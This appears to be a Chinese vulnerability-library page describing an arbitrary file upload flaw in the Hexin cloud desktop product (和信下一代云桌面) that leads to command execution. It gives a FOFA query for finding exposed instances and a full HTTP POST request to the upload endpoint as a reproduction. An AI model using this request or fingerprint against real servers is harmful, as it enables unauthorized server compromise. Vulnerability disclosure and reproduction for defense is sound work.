和信创天云桌面系统_命令执行_任意文件上传–胖多豪-漏洞文库小世界-安全文库-NGC660安全实验室

和信创天云桌面系统_命令执行_任意文件上传–胖多豪

简介

和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。

描述

和信创天云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限
Fofa:title=“和信下一代云桌面VENGD”

复现

POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 164

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/avif

1
------WebKitFormBoundaryfcKRltGv--

1627351304900-45cbc580-2b7e-4864-9df5-8a768b60dd39

1627351324827-0c655f96-d9c8-43de-8ed1-7bf71ae0d4df

请登录后发表评论

    请登录后查看回复内容